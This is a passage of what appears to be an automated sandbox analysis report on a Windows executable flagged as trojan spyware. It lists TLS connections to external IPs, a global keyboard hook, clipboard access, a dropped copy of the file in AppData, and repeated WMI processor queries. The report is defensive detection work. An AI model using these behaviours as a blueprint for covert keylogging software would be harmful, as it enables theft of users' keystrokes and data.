              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49811 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50015 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\gq8sce-clean.com.com.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0166FC700_2_0166FC70
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0166EA580_2_0166EA58
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_01660C700_2_01660C70
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_01660C4F0_2_01660C4F
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0194F4300_2_0194F430
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033600400_2_03360040
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033606F00_2_033606F0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033694700_2_03369470
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03363A870_2_03363A87
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03360C300_2_03360C30
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03366C790_2_03366C79
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033670670_2_03367067
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033696B40_2_033696B4
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033606E00_2_033606E0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_033694600_2_03369460
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03367B090_2_03367B09
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03363ACE0_2_03363ACE
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03363F550_2_03363F55
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03366FE10_2_03366FE1
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03366FD80_2_03366FD8
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_03360C200_2_03360C20
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A5D4200_2_05A5D420
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A556100_2_05A55610
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A555FF0_2_05A555FF
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A5C4E00_2_05A5C4E0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A5C4D30_2_05A5C4D3
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFCDB00_2_05CFCDB0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF75700_2_05CF7570
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF67D00_2_05CF67D0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF26E00_2_05CF26E0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF99400_2_05CF9940
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF81000_2_05CF8100
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFD8E00_2_05CFD8E0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF93D00_2_05CF93D0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFAB980_2_05CFAB98
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFEB680_2_05CFEB68
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF3B200_2_05CF3B20
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFFB380_2_05CFFB38
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFD2480_2_05CFD248
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFBDE00_2_05CFBDE0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF75610_2_05CF7561
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF67C00_2_05CF67C0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFC1B80_2_05CFC1B8
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFA1B00_2_05CFA1B0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF61400_2_05CF6140
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF992F0_2_05CF992F
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFC9300_2_05CFC930
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF61300_2_05CF6130
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFAB880_2_05CFAB88
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFEB570_2_05CFEB57
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CFB2A10_2_05CFB2A1
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0955D9000_2_0955D900
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_095504900_2_09550490
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_09550B9F0_2_09550B9F
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_09550EC00_2_09550EC0
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_095504810_2_09550481
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0213EA583_2_0213EA58
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0213FC703_2_0213FC70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_02130C4F3_2_02130C4F
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_02130C703_2_02130C70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_05E5F4303_2_05E5F430
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065506F03_2_065506F0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065500403_2_06550040
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06558E503_2_06558E50
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06556C793_2_06556C79
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06550C303_2_06550C30
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06553A873_2_06553A87
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065506E03_2_065506E0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065570673_2_06557067
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065590943_2_06559094
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06558E413_2_06558E41
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06553F553_2_06553F55
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06556FD83_2_06556FD8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06556FE13_2_06556FE1
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06550C203_2_06550C20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06553ACE3_2_06553ACE
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06557B093_2_06557B09
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065656103_2_06565610
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0656D4203_2_0656D420
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0656C4E03_2_0656C4E0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065655FF3_2_065655FF
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065648B03_2_065648B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D67C03_2_065D67C0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DA7883_2_065DA788
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D9DA03_2_065D9DA0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DD2403_2_065DD240
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D3B203_2_065D3B20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DD8D73_2_065DD8D7
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DAE913_2_065DAE91
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DA7793_2_065DA779
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DF7C83_2_065DF7C8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D67B03_2_065D67B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DFC203_2_065DFC20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D94B83_2_065D94B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D75503_2_065D7550
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D75603_2_065D7560
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D95003_2_065D9500
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D95303_2_065D9530
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D95203_2_065D9520
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DBDD83_2_065DBDD8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DCDA83_2_065DCDA8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DEB583_2_065DEB58
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DEB483_2_065DEB48
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D8BF03_2_065D8BF0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D83A43_2_065D83A4
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D61383_2_065D6138
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DC9283_2_065DC928
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065D612B3_2_065D612B
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_065DC1B03_2_065DC1B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A180F603_2_0A180F60
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A1804483_2_0A180448
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A18D9983_2_0A18D998
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A180F513_2_0A180F51
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_0A18043B3_2_0A18043B
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0241EA584_2_0241EA58
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0241FC704_2_0241FC70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_02410C4F4_2_02410C4F
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_02410C704_2_02410C70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_05EFF4304_2_05EFF430
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A06F04_2_066A06F0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A00404_2_066A0040
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A0C304_2_066A0C30
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A8C804_2_066A8C80
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A3D074_2_066A3D07
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6AC94_2_066A6AC9
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A06E04_2_066A06E0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A41D54_2_066A41D5
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6E284_2_066A6E28
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6E314_2_066A6E31
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A8EC44_2_066A8EC4
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A6EB74_2_066A6EB7
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A8C704_2_066A8C70
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A0C214_2_066A0C21
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A3D4E4_2_066A3D4E
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066A79594_2_066A7959
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F3F204_2_066F3F20
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F67C04_2_066F67C0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FD2384_2_066FD238
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F2AEA4_2_066F2AEA
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FD8CF4_2_066FD8CF
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FA1A04_2_066FA1A0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FEF604_2_066FEF60
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FEF504_2_066FEF50
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F8FF04_2_066F8FF0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F67B04_2_066F67B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F84F84_2_066F84F8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F75604_2_066F7560
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F75504_2_066F7550
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FBDD04_2_066FBDD0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FCDA04_2_066FCDA0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FC5B84_2_066FC5B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FB2914_2_066FB291
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FAB794_2_066FAB79
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FAB884_2_066FAB88
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F98B84_2_066F98B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F61214_2_066F6121
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FC9204_2_066FC920
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F99204_2_066F9920
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F61304_2_066F6130
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066F99304_2_066F9930
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_066FC1A84_2_066FC1A8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_079356104_2_07935610
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0793D4804_2_0793D480
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_079355FF4_2_079355FF
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0793C5404_2_0793C540
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_079348B04_2_079348B0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F0B604_2_0A0F0B60
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F00404_2_0A0F0040
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0FD5A04_2_0A0FD5A0
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0FFA904_2_0A0FFA90
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F0B514_2_0A0F0B51
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 4_2_0A0F001F4_2_0A0F001F
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4565689796.0000000001198000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exe, 00000000.00000000.2113428029.0000000001004000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed39e31f8-6055-4385-86be-4d10b950f405.exe8 vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4567833150.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4571013968.0000000003491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs gq8sce-clean.com.com.exe
              Source: gq8sce-clean.com.com.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@4/4
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile created: C:\Users\user\AppData\Roaming\OgBoRNJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMutant created: NULL
              Source: gq8sce-clean.com.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: gq8sce-clean.com.com.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
